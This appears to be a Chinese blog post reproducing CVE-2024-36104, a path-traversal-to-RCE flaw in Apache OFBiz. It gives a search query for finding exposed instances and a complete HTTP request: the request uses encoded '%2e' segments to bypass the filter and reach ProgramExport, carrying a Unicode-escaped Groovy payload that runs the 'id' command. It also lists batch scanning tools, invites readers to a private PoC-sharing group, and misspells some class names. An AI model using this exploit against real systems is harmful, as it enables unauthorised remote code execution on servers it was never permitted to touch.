【漏洞复现】Apache OFBiz 路径遍历导致RCE漏洞(CVE-2024-36104)

0x01 产品简介

Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。

0x02 漏洞概述

Apache OFBiz 18.12.14之前版本存在命令执行漏洞,该漏洞源于org.apache.otbiz.webapp.control.ControlFiter类对路径(请求URL中的特殊字符(如;、%2e)限制不当导致攻击者能够绕过后台功能点的过滤器验证,并通过webtools/control/ProgramExpor接囗的编程导出功能执行任意Groovy代码获取系统权限。

0x03 搜索语法

app="Apache_OFBiz"

在这里插入图片描述

0x04 漏洞复现

POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host: your-ip
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Content-Type: application/x-www-form-urlencoded
 
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

最近更新

  1. TCP协议是安全的吗?

    2024-06-06 07:04:04       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-06-06 07:04:04       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-06-06 07:04:04       19 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-06-06 07:04:04       20 阅读

热门阅读

  1. Debian常用命令详解

    2024-06-06 07:04:04       6 阅读
  2. NTP网络时间服务器_安徽京准电钟

    2024-06-06 07:04:04       7 阅读
  3. Http和Socks的区别?

    2024-06-06 07:04:04       7 阅读
  4. 机器人抓取检测(Robot Grasping Detection)

    2024-06-06 07:04:04       6 阅读
  5. Python库之pandas的简介、安装、使用方法详细攻略

    2024-06-06 07:04:04       5 阅读
  6. TCP/UDP的区别

    2024-06-06 07:04:04       9 阅读
  7. 运维开发详解

    2024-06-06 07:04:04       9 阅读
  8. 牛客周赛45

    2024-06-06 07:04:04       8 阅读
  9. 深度学习 - 张量的广播机制和复杂运算

    2024-06-06 07:04:04       10 阅读
  10. 音视频开发_SDL彻底理解纹理

    2024-06-06 07:04:04       7 阅读
  11. salesforce inactive的用户会收到通知邮件吗

    2024-06-06 07:04:04       8 阅读